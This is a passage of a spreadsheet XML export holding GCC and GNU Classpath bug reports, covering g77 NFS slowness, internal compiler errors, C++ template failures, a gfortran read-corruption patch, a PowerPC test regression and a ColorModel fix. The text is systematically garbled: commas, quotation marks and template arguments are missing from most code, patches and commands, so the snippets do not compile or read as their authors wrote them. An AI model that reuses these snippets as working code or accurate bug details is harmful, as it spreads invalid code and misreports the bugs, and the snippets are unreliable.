o -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lg2c -lm -lgcc -lc -lgcc /usr/lib/gcc-li
b/i386-linux/2.95.4/crtend.o /usr/lib/crtn.o
 /tmp/ccpZKWDe
__G77_LIBF77_VERSION__: 0.5.25 20010319 (prerelease)
@(#)LIBF77 VERSION 19990503
__G77_LIBI77_VERSION__: 0.5.25 20010319 (prerelease)
@(#) LIBI77 VERSION pjwdmg-mods 19990503
__G77_LIBU77_VERSION__: 0.5.25 20010319 (prerelease)
@(#) LIBU77 VERSION 19980709
$ g77 -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.2.3/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man
--infodir=/usr/share/info --enable-shared --enable-threads=posix
--disable-checking --with-system-zlib --enable-__cxa_atexit --host=i386-redhat-linux
Thread model: posix
gcc version 3.2.3 20030502 (Red Hat Linux 3.2.3-34)
$ g77-3.3 -v
Reading specs from /usr/lib/gcc-lib/i486-linux/3.3.3/specs
Configured with: ../src/configure -v
--enable-languages=cc++javaf77objcadatreelang --prefix=/usr
--mandir=/usr/share/man --infodir=/usr/share/info
--with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib
--enable-nls --without-included-gettext --enable-__cxa_atexit
--enable-clocale=gnu --enable-debug --enable-java-gc=boehm
--enable-java-awt=xlib --enable-objc-gc i486-linux
Thread model: posix
gcc version 3.3.3 20040110 (prerelease) (Debian)
I searched the web about this issue and found other people that asked about this
issue on different mailing lists but no one seems to have a solution or a work
around.
By digging in the g77 doc I found the ALWAYS_FLUSH dissertation but it seems
(at least to me) that this macro is no longer defined in libg2c just to
*increase* NFS I/O performance. So I'm a bit puzzled...
How to reproduce the strange behaviour:
The following is done on a RedHat Enterprise Linux 3.0 machine having other
RHEL3 filesystems mounted via NFS.
Let's start on the local filesystem:
$ df --si .
Filesystem             Size   Used  Avail Use% Mounted on
/dev/cciss/c0d0p2     139GB  8.1GB  124GB   7% /
$ ls
mywrite.f
$ cat mywrite.f 
      program mywrite
c     constant definitions
c     
      integer n
      parameter (n=800000)
c     variable declarations
c     
      integer i
      complex cvar
c     write out unformatted file
c     
      open (unit=3file='myout.dat'form='unformatted')
      close(unit=3status='delete')
      open (unit=3file='myout.dat'form='unformatted')
      rewind 3
      cvar = (1.23e200.31e20)
      write (3) n
      do 10 i = 1 n
        cvar = cvar/1.1
        write (3) cvar
 10   continue
      close (unit=3)
      stop
      end
$ g77 -static -o mywrite mywrite.f 
$ \time -o localtime ./mywrite
$ cat localtime 
3.52user 12.06system 0:15.88elapsed 98%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (33major+16minor)pagefaults 0swaps
Now let's turn to the remote NFS-mounted filesystem:
$ df --si .
Filesystem             Size   Used  Avail Use% Mounted on
192.168.0.10:/home10b
                       79GB  199MB   75GB   1% /home10b
$ cat /proc/mounts | grep 10b
192.168.0.10:/home10b /home10b nfs rwv3rsize=8192wsize=8192hardudplockadd
r=192.168.0.10 0 0
$ ls 
mywrite.f
$ g77 -static -o mywrite mywrite.f 
$ \time -o nfstime ./mywrite
Well after about *one hour* it's still running: the output file is about *one
half* of its final size and still (slowly) growing...   :-(
I'll add the result when it's finished...
Any ideas?
Why do I obtain unreasonable times (two hours for a 13 Mbyte output file that
can be copied to the same NFS-mounted filesystem in less than one half of a
second with cp)?
Any help will be much appreciated.
TNX</t>
  </si>
  <si>
    <t>e-frx</t>
  </si>
  <si>
    <t>GCC-51505</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: in form_sum at reload.c:5349 with -O --param max-cse-insns=1</t>
  </si>
  <si>
    <t>Created attachment 26050
reduced testcase
Compiler output:
$ gcc -O --param max-cse-insns=1 testcase.c
testcase.c: In function 'foo':
testcase.c:16:1: internal compiler error: in form_sum at reload.c:5345
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) list
5340    form_sum (enum machine_mode mode rtx x rtx y)
5341    {
5342      rtx tem
5343
5344      gcc_assert (GET_MODE (x) == mode || GET_MODE (x) == VOIDmode)
5345      gcc_assert (GET_MODE (y) == mode || GET_MODE (y) == VOIDmode)
5346
5347      if (CONST_INT_P (x))
5348        return plus_constant (y INTVAL (x))
5349      else if (CONST_INT_P (y))
(gdb) bt
#0  fancy_abort (file=0x12886d0 /mnt/svn/gcc-trunk/gcc/reload.c line=5345 function=0x1289340 form_sum)
    at /mnt/svn/gcc-trunk/gcc/diagnostic.c:898
#1  0x0000000000942b5e in form_sum (mode=DImode x= y=) at /mnt/svn/gcc-trunk/gcc/reload.c:5345
#2  0x000000000095a94e in eliminate_regs_1 (x=0x7ffff569ae70 mem_mode=QImode insn=0x7ffff569ade0 may_use_invariant=Unhandled dwarf expression opcode 0xf3
)
    at /mnt/svn/gcc-trunk/gcc/reload1.c:2685
#3  0x000000000095a898 in eliminate_regs_1 (x=0x7ffff569ae58 mem_mode=QImode insn=0x7ffff569ade0 may_use_invariant=Unhandled dwarf expression opcode 0xf3
)
    at /mnt/svn/gcc-trunk/gcc/reload1.c:2663
#4  0x000000000095ac85 in eliminate_regs_1 (x=0x7ffff569ae40 mem_mode=VOIDmode insn=0x7ffff569ade0 may_use_invariant=Unhandled dwarf expression opcode 0xf3
)
    at /mnt/svn/gcc-trunk/gcc/reload1.c:2886
#5  0x000000000095aab2 in eliminate_regs_1 (x=0x7ffff569ae28 mem_mode=VOIDmode insn=0x7ffff569ade0 may_use_invariant=Unhandled dwarf expression opcode 0xf3
)
    at /mnt/svn/gcc-trunk/gcc/reload1.c:2743
#6  0x000000000095b2da in eliminate_regs_1 (x=0x7ffff569ae10 mem_mode=VOIDmode insn=0x7ffff569ade0 may_use_invariant=Unhandled dwarf expression opcode 0xf3
)
    at /mnt/svn/gcc-trunk/gcc/reload1.c:2755
#7  0x000000000095b1e3 in eliminate_regs_1 (x=0x7ffff569adf8 mem_mode=VOIDmode insn=0x7ffff569ade0 may_use_invariant=Unhandled dwarf expression opcode 0xf3
)
    at /mnt/svn/gcc-trunk/gcc/reload1.c:2780
#8  0x000000000095b1e3 in eliminate_regs_1 (x=0x7ffff569ade0 mem_mode=VOIDmode insn=0x7ffff569ade0 may_use_invariant=Unhandled dwarf expression opcode 0xf3
)
    at /mnt/svn/gcc-trunk/gcc/reload1.c:2780
#9  0x0000000000966965 in eliminate_regs_in_insn (insn=0x7ffff555bdc8 replace=0) at /mnt/svn/gcc-trunk/gcc/reload1.c:3623
#10 0x0000000000967ddd in calculate_needs_all_insns (global=1) at /mnt/svn/gcc-trunk/gcc/reload1.c:1523
#11 0x0000000000968c85 in reload (first=0x7ffff5693340 global=1) at /mnt/svn/gcc-trunk/gcc/reload1.c:945
#12 0x000000000087c670 in ira () at /mnt/svn/gcc-trunk/gcc/ira.c:3725
#13 rest_of_handle_ira () at /mnt/svn/gcc-trunk/gcc/ira.c:3798
#14 0x00000000008f8ac5 in execute_one_pass (pass=0x17be800) at /mnt/svn/gcc-trunk/gcc/passes.c:2079
#15 0x00000000008f8e65 in execute_pass_list (pass=0x17be800) at /mnt/svn/gcc-trunk/gcc/passes.c:2134
#16 0x00000000008f8e77 in execute_pass_list (pass=0x17beee0) at /mnt/svn/gcc-trunk/gcc/passes.c:2135
#17 0x0000000000a5a5ee in tree_rest_of_compilation (fndecl=0x7ffff5672c00) at /mnt/svn/gcc-trunk/gcc/tree-optimize.c:421
#18 0x00000000006ad84a in cgraph_expand_function (node=0x7ffff55636c0) at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1818
#19 0x00000000006af5ec in cgraph_expand_all_functions () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1885
#20 cgraph_optimize () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2198
#21 0x00000000006afd5a in cgraph_finalize_compilation_unit () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1327
#22 0x000000000058d620 in c_write_global_declarations () at /mnt/svn/gcc-trunk/gcc/c-decl.c:10026
#23 0x00000000009edc94 in compile_file (argc=15 argv=0x7fffffffdad8) at /mnt/svn/gcc-trunk/gcc/toplev.c:573
#24 do_compile (argc=15 argv=0x7fffffffdad8) at /mnt/svn/gcc-trunk/gcc/toplev.c:1928
#25 toplev_main (argc=15 argv=0x7fffffffdad8) at /mnt/svn/gcc-trunk/gcc/toplev.c:2004
#26 0x00007ffff61570ed in __libc_start_main () from /lib64/libc.so.6
#27 0x0000000000570df1 in _start ()
The testcase was reduced from gcc.target/i386/sse2-pandn-1.c which needs more flags:
$ gcc -O -fno-tree-loop-optimize -funroll-loops --param=max-cse-insns=1 gcc.target/i386/sse2-pandn-1.c
In file included from gcc.target/i386/sse2-pandn-1.c:13:0:
gcc.target/i386/sse2-check.h: In function 'do_test':
gcc.target/i386/sse2-check.h:13:1: internal compiler error: in form_sum at reload.c:5345
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r182206 - crash
4.6 r180325 - crash
4.5 r180325 - crash
4.4 r180325 - OK</t>
  </si>
  <si>
    <t>GCC-2554</t>
  </si>
  <si>
    <t>Parser or user problem ?</t>
  </si>
  <si>
    <t xml:space="preserve"> Hi all  apologies for bugging you with this problem which may
 in the end just be a problem in my understanding of C++ syntax...
 Anyway in gcc (gcc version 2.96 20000731 (Red Hat Linux 7.0))
 on i386 I am unable to accomplish the following:
 I have a class with a template member function:
 struct scalc {
  unsigned
  scalc(unsigned&amp; t) : s(t) { }
  template
  void operator()(const T }
 }
 Now I want to implement a specialization of operator() that
 works on an STL std::set template.
 The most obvious:
   template void scalc::operator()(const std::set }  
 Gives me:
 tmp.cc:12: prototype for `void scalc::operator() (const set&lt;Q
 less allocator &gt; &amp;)' does not match any in class `scalc'
 tmp.cc:9: candidate is: template  void scalc::operator()
 (const T &amp;)
 tmp.cc:12: template definition of non-template `void scalc::operator()
 (const set allocator &gt; &amp;)'
 Shouldn't this work ?    I have been trying quite a few variants of the above
 trying to guess how to put it (from reading Bjarne's book) and while I do
 manage to get some interesting error messages from GCC I am unable to get
 the darn thing to compile.
 Please let me know if this is a problem in GCC or whether I was just
 too stupid to to figure out the syntax myself.   :)
 Thank you
 -- 
 ................................................................
 :   jakob@unthought.net   : And I see the elder races         :
 :.........................: putrid forms of man                :
 :   Jakob Ã˜stergaard      : See him rise and claim the earth  :
 :        OZ9ABN           : his downfall is at hand.           :
 :.........................:............{Konkhra}...............:
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-4072</t>
  </si>
  <si>
    <t>g++ fails to compile template code</t>
  </si>
  <si>
    <t>Apoligies if this bug is the Two stage lookup in templates is not implemented. mentioned on the gcc web site but my c++ isn't that good.
g++ fails to compile and hangs with the following error:-
adrian@falcon:/home/adrian/code/c++/testbed&gt; g++ -g -ansi -pedantic it.cpp -o it
In file included from it.cpp:5:
Table.h:36: syntax error before `' token
Table.h: In constructor `Table::Table()':
Table.h:14: parse error before `' token
(hangs here)
if it helps here is the process from the process table:-
Release:
3.0
Environment:
System: Linux falcon 2.2.18-SMP #1 SMP Wed Jan 24 12:30:30 GMT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /home/adrian/gcc/gcc-3.0/configure --prefix=/usr --enable-threads
How-To-Repeat:
The following 2 source causes this error:-
/* Table.h */
#ifndef TABLE_H
#define TABLE_H
#include 
#include 
#include 
#include 
template 
class Table
{
	public:
		Table(const std::string 		
		Table() {}
		~Table()
		bool Insert(T 
		bool Delete(const T 
		bool Modify(const T 
		bool Find(const T 
		void GoToFirst(void)
		bool GetFirst(T 
		bool GetNext(T 
		void ShowMemTable(void)
	private:
		Table(const Table 
		Table 
		void LoadRecords(void)
		unsigned long NextRecordNo
		std::string FileName
		std::fstream *FilePtr
		std::vector Records
		std::vector::iterator MemPtr
}
template 
Table::Table(const std::string &amp;filename)
	:FileName(filename)
{
	NextRecordNo=1
	FilePtr=new std::fstream(FileName.c_str() std::ios_base::in | std::ios_base::out)
	if(!*FilePtr)
	{
		std::cout &lt;&lt; File does not exist. Creating  &lt;&lt; FileName &lt;&lt; std::endl
		delete FilePtr
		FilePtr=new std::fstream(FileName.c_str() std::ios_base::in | std::ios_base::out | std::ios_base::trunc)
		*FilePtr &lt;&lt; std::setfill('0') &lt;&lt; std::setw(10) &lt;&lt;NextRecordNo &lt;&lt; std::endl
		if(!*FilePtr)
		{
			throw std::string(Cannot open file  + FileName)
		}
	}
	// Read next record number from file
	FilePtr-&gt;seekg(0)
	*FilePtr &gt;&gt; NextRecordNo
	if(FilePtr-&gt;eof())
	{
		FilePtr-&gt;clear()
	}
	std::cout &lt;&lt; Next recno= &lt;&lt; NextRecordNo &lt;&lt; std::endl
	LoadRecords()
	std::cout &lt;&lt; Records.size() &lt;&lt;  records loaded\n
}
template 
Table::~Table()
{
	std::vector::iterator i=Records.begin()
	for(  i&lt;Records.end() i++)
	{
		delete *i
	}
	delete FilePtr
}
template 
bool Table::Insert(T &amp;r)
{
	// Increment record number
	r.SetAutoIncrement(NextRecordNo)
	Records.push_back(new T(r))
	FilePtr-&gt;seekp(0 std::ios_base::end)
	*FilePtr &lt;&lt; r &lt;&lt; std::endl
	FilePtr-&gt;seekp(0 std::ios_base::beg)
	NextRecordNo++
	*FilePtr &lt;&lt; std::setfill('0') &lt;&lt; std::setw(10) &lt;&lt; NextRecordNo &lt;&lt; std::endl
	return true
}
template 
bool Table::Delete(const T &amp;r)
{
	return false
}
template 
bool Table::Modify(const T &amp;r)
{
	bool rc=false
	if(Find(r))
	{
		*FilePtr &lt;&lt; r &lt;&lt; std::endl
		**MemPtr=r
		if(FilePtr-&gt;good())
		{
			rc=true
		}
	}
	return rc
}
template 
bool Table::Find(const T &amp;r)
{
	MemPtr=std::find(Records.begin() Records.end() r)
	if(MemPtr==Records.end())
	{
		// Dont search file if not in mem table
		return false
	}
	std::fstream::pos_type save
	T file_rec
	GoToFirst()
	while(!FilePtr-&gt;eof())
	{
		save=FilePtr-&gt;tellg()
		*FilePtr &gt;&gt; file_rec
		if(file_rec==r)
		{
			std::cout &lt;&lt; Found it\n
			FilePtr-&gt;seekg(save std::ios_base::beg)
			FilePtr-&gt;seekp(save std::ios_base::beg)
			return true
		}
		FilePtr-&gt;ignore(1000 '\n')
	}	
	FilePtr-&gt;clear()
	return false
}
template 
void Table::GoToFirst(void)
{
	FilePtr-&gt;seekg(0)
	// Skip next rec no
	FilePtr-&gt;ignore(11 '\n')
	MemPtr=Records.begin()
}
template 
bool Table::GetFirst(T &amp;r)
{
	GoToFirst()
	*FilePtr &gt;&gt; r
	return FilePtr-&gt;good()
}
template 
bool Table::GetNext(T &amp;r)
{
	*FilePtr &gt;&gt; r
	MemPtr++
	return FilePtr-&gt;good()
}
template 
void Table::LoadRecords(void)
{
	T rec
	if(GetFirst(rec))
	{
		Records.push_back(new T(rec))
		while(GetNext(rec))
		{
			Records.push_back(new T(rec))
		}
	}
	if(FilePtr-&gt;eof())
	{
		FilePtr-&gt;clear()
	}
	FilePtr-&gt;seekg(0)
	FilePtr-&gt;seekp(0)
	MemPtr=Records.begin()
}
template 
void Table::ShowMemTable(void)
{
	std::vector::iterator i=Records.begin()
	for(  i&lt;Records.end() i++)
	{
		std::cout &lt;&lt; (**i) &lt;&lt; std::endl
	}
}
#endif
/* it.cpp */
#include 
#include 
#include 
#include Table.h
using namespace std
int main(int argc char *argv[])
{
	Table a
	Table b
	return 0
}</t>
  </si>
  <si>
    <t>adrian.cornish</t>
  </si>
  <si>
    <t>GCC-69469</t>
  </si>
  <si>
    <t>test case gcc.target/powerpc/vsx-vector-2.c fails on power starting with r232632</t>
  </si>
  <si>
    <t>This fails on both BE and LE.
Executing on host: /home/seurer/gcc/build/gcc-test/gcc/xgcc -B/home/seurer/gcc/build/gcc-test/gcc/ /home/seurer/gcc/gcc-test/gcc/testsuite/gcc.target/powerpc/vsx-vector-2.c   -fno-diagnostics-show-caret -fdiagnostics-color=never  -O2 -ftree-vectorize -mcpu=power7 -ffast-math -ffat-lto-objects -S   -o vsx-vector-2.s    (timeout = 300)
spawn /home/seurer/gcc/build/gcc-test/gcc/xgcc -B/home/seurer/gcc/build/gcc-test/gcc/ /home/seurer/gcc/gcc-test/gcc/testsuite/gcc.target/powerpc/vsx-vector-2.c -fno-diagnostics-show-caret -fdiagnostics-color=never -O2 -ftree-vectorize -mcpu=power7 -ffast-math -ffat-lto-objects -S -o vsx-vector-2.s
PASS: gcc.target/powerpc/vsx-vector-2.c (test for excess errors)
PASS: gcc.target/powerpc/vsx-vector-2.c scan-assembler xvaddsp
PASS: gcc.target/powerpc/vsx-vector-2.c scan-assembler xvsubsp
PASS: gcc.target/powerpc/vsx-vector-2.c scan-assembler xvmulsp
PASS: gcc.target/powerpc/vsx-vector-2.c scan-assembler xvdivsp
PASS: gcc.target/powerpc/vsx-vector-2.c scan-assembler vmadd
PASS: gcc.target/powerpc/vsx-vector-2.c scan-assembler xvmsub
FAIL: gcc.target/powerpc/vsx-vector-2.c scan-assembler xvsqrtsp
PASS: gcc.target/powerpc/vsx-vector-2.c scan-assembler xvcpsgnsp
PASS: gcc.target/powerpc/vsx-vector-2.c scan-assembler xvrspim
PASS: gcc.target/powerpc/vsx-vector-2.c scan-assembler xvrspip
PASS: gcc.target/powerpc/vsx-vector-2.c scan-assembler xvrspiz
PASS: gcc.target/powerpc/vsx-vector-2.c scan-assembler xvrspic
PASS: gcc.target/powerpc/vsx-vector-2.c scan-assembler xvrspi 
The differences in the output are significant:
seurer@genoa:~/gcc/build/gcc-test3$ diff vsx-vector-2.s.r232631  vsx-vector-2.s.r232632
. . .
242a243
&gt; 	xxlxor 111111
245246c246
&lt; 	ld 10.LC22@toc@l(9)
&lt; 	li 90
---
&gt; 	addi 99.LC22@toc@l
248c248252
&lt; 	.p2align 531
---
&gt; 	lxvd2x 1009
&gt; 	addis 92.LC23@toc@ha
&gt; 	ld 10.LC23@toc@l(9)
&gt; 	li 90
&gt; 	.p2align 415
251c255261
&lt; 	xvsqrtsp 00
---
&gt; 	xvrsqrtesp 120
&gt; 	xvcmpgtsp 9011
&gt; 	xxsel 1211129
&gt; 	xvmulsp 0120
&gt; 	xvmulsp 121210
&gt; 	xvnmsubmsp 12010
&gt; 	xvmaddasp 0012
Those are in the vector_sqrt function.
------------------------------------------------------------------------
r232632 | dje | 2016-01-20 13:39:08 -0600 (Wed 20 Jan 2016) | 6 lines
	PR target/68609
        * config/rs6000/rs6000.c (rs6000_emit_swsqrt): Add vector sqrt
        domain check.
        * config/rs6000/vector.md (sqrt2): Call rs6000_emit_swsqrt
        for V4SFmode.</t>
  </si>
  <si>
    <t>CLASSPATH-22919</t>
  </si>
  <si>
    <t>java.awt.image.ColorModel bits calculation error</t>
  </si>
  <si>
    <t>The calculation of the number of bits in the ColorModel(int bits) constructor is incorrect.
Instead of multiplying by 4 it should divide the bits by 4 in order to be compatible with sun's implementation.
Here is the REVERSE patch.
--- javaawtimageColorModel.java	Sun Mar 06 10:03:13 2005
+++ D:eprcvsworkclasspathjavaawtimageColorModel.java	Tue Nov 16 23:10:27 2004
@@ -11113 +11112 @@
 	 * Constructs the default color model.  The default color model 
 	 * can be obtained by calling getRGBdefault of this
 	 * class.
-	 * @param b the number of bits wide used for bit size of pixel values
+   * @param bits the number of bits wide used for bit size of pixel values
 	 */
   public ColorModel(int bits)
   {
-      // @classpath-bugfix Fix difference between Sun's class and this class. 
-    this(bits // total bits sRGB four channels
-	 nArray(bits / 4 4) // bits for each channel
+    this(bits * 4 // total bits sRGB four channels
+	 nArray(bits 4) // bits for each channel
 	 ColorSpace.getInstance(ColorSpace.CS_sRGB) // sRGB
 	 true // has alpha
 	 false // not premultiplied</t>
  </si>
  <si>
    <t>GCC-31880</t>
  </si>
  <si>
    <t>[4.2 only] silent data corruption in gfortran read statement</t>
  </si>
  <si>
    <t>This program should print out 1.
Instead it prints out 1024:
      program r3
      integer*4 a(1025)b(1025)c(1025)d(2048)e(1022)
      do i=12048
         d(i)=i
      end do
      open  (3file='a'form='unformatted')
      write (3) abcde
      rewind 3
      read  (3) abcd
      close (3)
      print *d(1)
      end
output of /opt/bin/gfortran -v:
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.1.2/configure --prefix=/opt --disable-multilib
Thread model: posix
gcc version 4.1.2
It was compiled with:
/opt/bin/gfortran -Wall -o r3 r3.f
and run with:
LD_LIBRARY_PATH=/opt/lib64 ./r3
This patch fixes it:
--- gcc-4.1-4.1.2/gcc-4.1.2/libgfortran/io/unix.c	2006-05-29 22:51:26.000000000 -0400
+++ gcc-4.1-4.1.2_patched/gcc-4.1.2/libgfortran/io/unix.c	2007-05-08 19:22:09.000000000 -0400
@@ -4657 +4657 @@
       if (n &lt; 0)
 	return NULL
-      s-&gt;physical_offset = where + n
+      s-&gt;physical_offset = m + n
       s-&gt;active += n
     }
   else
@@ -4767 +4767 @@
       if (do_read (s s-&gt;buffer + s-&gt;active &amp;n) != 0)
 	return NULL
-      s-&gt;physical_offset = where + n
+      s-&gt;physical_offset = m + n
       s-&gt;active += n
     }
The problem is that s-&gt;physical_offset is being miscalculated as
where+n which is the requested read start address plus the bytes read
from the disk to fill the buffer.  It should be where+s-&gt;active+n
(=m+n) the requested read start address plus the as-yet-unread bytes
still in the buffer plus the bytes read from the disk to fill the
buffer.  The s-&gt;logical_offset is correctly set to where+*len.
What happens is that if an unbuffered (&lt;8192 bytes) read of more than
half the buffer (array b in the example) exceeds the data remaining in
the buffer the remaining data will get moved to the beginning of the
buffer and some amount of data will be read from disk to fill the
buffer.  If the next read (array c) is of the same length it will
also exceed the data remaining in the buffer the remaining data will
get moved to the beginning of the buffer and this time the length of
the data read from the disk (n) will be the same as the requested read
length (*len).  Since the physical_offset is being set to where+n and
s-&gt;logical_offset is set to where+*len they are equal.  If the next
read is &gt;=8192 bytes (array d) it will be unbuffered which would
normally cause the data remaining in the buffer to be ignored and
cause a seek to re-read that data along with the rest of the request
from the disk.  But the code will decide that it doesn't have to seek
because physical_offset=logical_offset.  So the remaining data in the
buffer will be lost.</t>
  </si>
  <si>
    <t>roconnor</t>
  </si>
  <si>
    <t>GCC-25439</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 regression] template int A accepted</t>
  </si>
  <si>
    <t>The following invalid code snippet is accepted since GCC 4.0.0:
============================
template struct A
template int A
============================
Before we got the error message:
  bug.cc:2: error: `A' specified as declarator-id
  bug.cc:2: error: extraneous `int' ignored</t>
  </si>
  <si>
    <t>GCC-20263</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] Incorrect asm for global register vars</t>
  </si>
  <si>
    <t xml:space="preserve">
Using a global variable tied to register g7 generates invalid assembly
code on sparc64.
Consider:
    register void *tp __asm__(%g7)
    void set_tp() {
	tp = 0
    }
Compiling this file produces an error and a warning from the assembler:
    /usr/ccs/bin/as: /var/tmp//ccLsIpQg.s line 2: error: statement syntax
    /usr/ccs/bin/as: /var/tmp//ccLsIpQg.s line 10: warning: detect global register use not covered .register pseudo-op
Environment:
System: SunOS plg2.math 5.8 Generic_117350-18 sun4u sparc SUNWSun-Fire-880
Architecture: sun4
host: sparc64-sun-solaris2.8
build: sparc64-sun-solaris2.8
target: sparc64-sun-solaris2.8
configured with: ../gcc/configure --prefix=/u/rcbilson/software/gcc --enable-languages=cc++ sparc64-sun-solaris2.8
How-To-Repeat:
Attempt to compile the above program fragment.</t>
  </si>
  <si>
    <t>rcbilson</t>
  </si>
  <si>
    <t>GCC-1101</t>
  </si>
  <si>
    <t>c++ errors in building libjava</t>
  </si>
  <si>
    <t>Configured compiled and installed gcc with --prefix=~/.
Configured libjava with --with-threads=posix and --prefix=~/.  The make of libjava resulted in the following error:
c++ -DHAVE_CONFIG_H -I. -I../libjava -I./include -I../libjava -Iinclude -I../libjava/include -I../libjava/../boehm-gc -I./../boehm-gc -I../libjava/libltdl -I../libjava/libltdl -I../libjava/../gcc -I../libjava/../include -I../libjava/../zlib -I../libjava/../libffi/include -I../libffi/include -fno-rtti -fvtable-thunks -fasynchronous-exceptions -fdollars-in-identifiers -I/usr/openwin/include -W -Wall -D_GNU_SOURCE -g -O2 -Wp-MD.deps/prims.pp -c ../libjava/prims.cc  -fPIC -DPIC -o .libs/prims.o
In file included from java/lang/String.h:9
                 from ../libjava/java/lang/Class.h:18
                 from ../libjava/gcj/cni.h:17
                 from ../libjava/prims.cc:32:
../libjava/gcj/array.h:59: Internal error #20000409.
../libjava/gcj/array.h:59: Internal compiler error in write_builtin_type at
   cp/mangle.c:1483
Please submit a full bug report.
Release:
gcc version 2.97 20001219 (experimental)
Environment:
sparc Solaris 2.6 Generic_105181-19</t>
  </si>
  <si>
    <t>yoda</t>
  </si>
  <si>
    <t>GCC-11596</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE with int templates</t>
  </si>
  <si>
    <t>The following example causes an ICE:
gonzo:~ # cat foo.cc
template 
struct a
{
  enum { value = D? A+B: A+C }
}
template 
struct b
{
//   enum { value = a::value }  // compiles
//   enum { value = a::value }  // compiles as well
//   enum { value = a::value }  // compiles as well
  enum { value = a::value }  // ICE
}
int main()
{
  return b::value
}
gonzo:~ # g++-cvs -v
Reading specs from /gml/shared/gcc-cvs/lib/gcc-lib/i686-pc-linux-gnu/3.4/specs
Configured with: ../gcc/configure --prefix=/gml/shared/gcc-cvs --enable-shared
--enable-languages=cc++ --enable-threads=posix
Thread model: posix
gcc version 3.4 20030719 (experimental)
gonzo:~ # g++-cvs foo.cc
foo.cc:14: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>weiss</t>
  </si>
  <si>
    <t>GCC-24416</t>
  </si>
  <si>
    <t>Wrong reading following namelist reading</t>
  </si>
  <si>
    <t>$ cat foo.f90
        PROGRAM foo
        IMPLICIT NONE
        CHARACTER(len=10)  namevar
        NAMELIST /input/ var
        OPEN(unit=1file=input.tmpdelim='apostrophe'status='unknown')
        READ(1NML=input)
        CLOSE(1)
        OPEN(unit=1file=toto.tmpstatus='old')
        READ(1*) name
        CLOSE(1)
        WRITE(**) name
        END PROGRAM foo
$ gfortran-4.0 foo.f90
$ cat input.tmp 
&amp;INPUT
   var='not '
/
$ cat toto.tmp
good
$ a.out
not good       
Well if it's written...
So for some reason the value of 'var' is concatenated to that of name. 
This is also the case when reading a number from 'toto.tmp' instead of a string. 
In that case the correct read number appears concatenated to some other number
(corresponding to 'var' presumably).
The problem does not occur when the last variable of the namelist is not a character type.
$ gfortran-4.0 -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.0.0/configure 
--prefix=/usr/local/stow/gcc-4.0-1 
--enable-languages=cf95 
--with-gmp=/usr/local/stow/gmp-4.1.4 
--with-mpfr=/usr/local/stow/mpfr-2.1.1 
--program-suffix=-4.0
Thread model: posix
gcc version 4.0.0</t>
  </si>
  <si>
    <t>jg69</t>
  </si>
  <si>
    <t>GCC-42353</t>
  </si>
  <si>
    <t>[OOP] Bogus Error: Name 'vtype$...' at (1) is an ambiguous reference ...</t>
  </si>
  <si>
    <t>Hi there
the attached code compiles with nagfor but fails to do so with
gfortran 4.5.0 rev. 155016:
gfcbug96.f90:45.33:
end module concrete_inner_product
                                 1
Error: Name 'vtype$vector_class' at (1) is an ambiguous reference to 'vtype$vect
or_class' from module 'concrete_vector'
gfcbug96.f90:45.33:
end module concrete_inner_product
                                 1
Error: Name 'vtype$vector_class' at (1) is an ambiguous reference to 'vtype$vect
or_class' from module 'concrete_vector'
gfcbug96.f90:43.23:
  use concrete_gradient
                       1
Error: The element in the derived type constructor at (1) for pointer component
 '$extends' is DERIVED but should be DERIVED</t>
  </si>
  <si>
    <t>GCC-4139</t>
  </si>
  <si>
    <t>gcc -V 2.95.x fails on comments and preprocessor directives</t>
  </si>
  <si>
    <t xml:space="preserve">        gcc and g++ output parse erros for every /* or // found in the source.
        Preprocessor directives will result in 'undefined or invalid #
+directive'
Release:
3.0.1
Environment:
System: Linux nubis 2.4.9 #1 Tue Aug 21 19:58:29 CEST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.0.1/configure --prefix=/usr --enable-shared
+--with-gnu-as --with-gnu-ld --enable-threads --enable-cpp
How-To-Repeat:
        /* comment */
        int main(){}
        gcc -V 2.95.3 -o test test.c
        test.c:1: parse error before `/'
        ------------------
        #include 
        int main(){}
        gcc -V 2.95.3 -o test test.c
        test.c:1: undefined or invalid # directive
        gcc -V 2.95.3 -E -o test.i test.c
        gcc -V 2.95.3 -o test test.i
        cc1: Invalid option `-fpreprocessed'</t>
  </si>
  <si>
    <t>GCC-43669</t>
  </si>
  <si>
    <t>libgcc build fails with  Error: cannot represent subtraction with an offset</t>
  </si>
  <si>
    <t>libgcc build fails with:
